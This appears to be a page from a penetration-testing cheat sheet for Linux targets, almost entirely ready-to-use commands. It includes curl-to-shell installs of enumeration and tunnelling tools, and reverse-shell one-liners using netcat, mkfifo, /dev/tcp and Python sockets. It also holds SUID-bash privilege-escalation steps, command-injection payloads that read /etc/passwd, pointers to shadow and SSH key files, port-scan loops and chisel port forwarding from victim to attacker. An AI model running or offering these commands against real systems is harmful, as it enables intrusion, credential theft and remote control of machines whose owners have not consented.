Linux

Sudo

sudo -l

Enumeration

Script

LinPeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Linux Smart Enumeration

curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1

Metasploit

msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'

Docker

curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O

File

Classic

/etc/passwd & /etc/shadow
/www/html ꞏ /var/www ꞏ /srv/html ꞏ /usr/share/*
/home/user/.ssh
/etc/cron.d
/opt/
/usr/local/bin
/etc/nginx/sites-available/default
/etc/apache2/sites-enabled/000-default.conf

Proc

/proc/ contains useful information about the processes that are currently running

Command

find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/

/sbin/getcap -r *

Reverse Shell

Server

nc -lp 4444

reSH

# Client
resh ip 4444
# Server
resh 4444

Source

Netcat

nc ip 4444 -e /bin/bash

Mkfifo

mkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f

Dev

bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'"

Python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

TTY Support

bash -i

python3 -c 'import pty; pty.spawn("/bin/bash")'

script -qc /bin/bash /dev/null

rlwrap

rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY source

rlwrap command

# Receiving connection from a reverse shell
rlwrap nc -lnvp port

# Connecting to the victim
rlwrap nc ip port

# Add actual bash history and to put all words seen on in- and output on the completion list.
rlwrap nc -r -f . nc ip port

source

Privilege Escalation

/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p

chmod 4755 /bin/bash
bash -p

FTP

Port: 21
File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers

Scan

nmap --script ftp-* -p 21 ip

Download all files

wget -m --user=user --password=fpassword ftp://ip

wget -m --user=anonymous --password=anonymous ftp://ip

Gdbserver

Port: 1337
Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system.

$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file

Command Injection

;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "

GTFOBins - Bypass local security restrictions

Network

Netstat

netstat -tulpn

Scan Port

for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null

Scan Ip

for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Port Forwarding

Chisel

# Install chisel
curl https://i.jpillora.com/chisel! | bash

# Example: 8000 -> 4444

# Attacker machine:
chisel server -p 4444 --reverse

# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000

SSH

ssh -L 8080:127.0.0.1:8080 user@ip

SCP

Download File

scp -P port user@192.168.1.ip:path .

Upload File

scp -P port file user@192.168.1.ip:path

Upload peda

scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda

PreviousJavascript NextNetwork

Last updated 2 years ago

hashtagSudo

hashtagEnumeration

hashtagScript

hashtagLinPeas

hashtagLinux Smart Enumeration

hashtagMetasploit

hashtagDocker

hashtagFile

hashtagClassic

hashtagProc

hashtagCommand

hashtagReverse Shell

hashtagServer

hashtagreSH

hashtagNetcat

hashtagMkfifo

hashtagDev

hashtagPython

hashtagTTY Support

hashtagrlwrap

hashtagPrivilege Escalation

hashtagFTP

hashtagScan

hashtagDownload all files

hashtagGdbserver

hashtagCommand Injection

hashtagNetwork

hashtagNetstat

hashtagScan Port

hashtagScan Ip

hashtagPort Forwarding

hashtagChisel

hashtagSSH

hashtagSCP

hashtagDownload File

hashtagUpload File

hashtagUpload peda

Sudo

Enumeration

Script

LinPeas

Linux Smart Enumeration

Metasploit

Docker

File

Classic

Proc

Command

Reverse Shell

Server

reSH

Netcat

Mkfifo

Dev

Python

TTY Support

rlwrap

Privilege Escalation

FTP

Scan

Download all files

Gdbserver

Command Injection

Network

Netstat

Scan Port

Scan Ip

Port Forwarding

Chisel

SSH

SCP

Download File

Upload File

Upload peda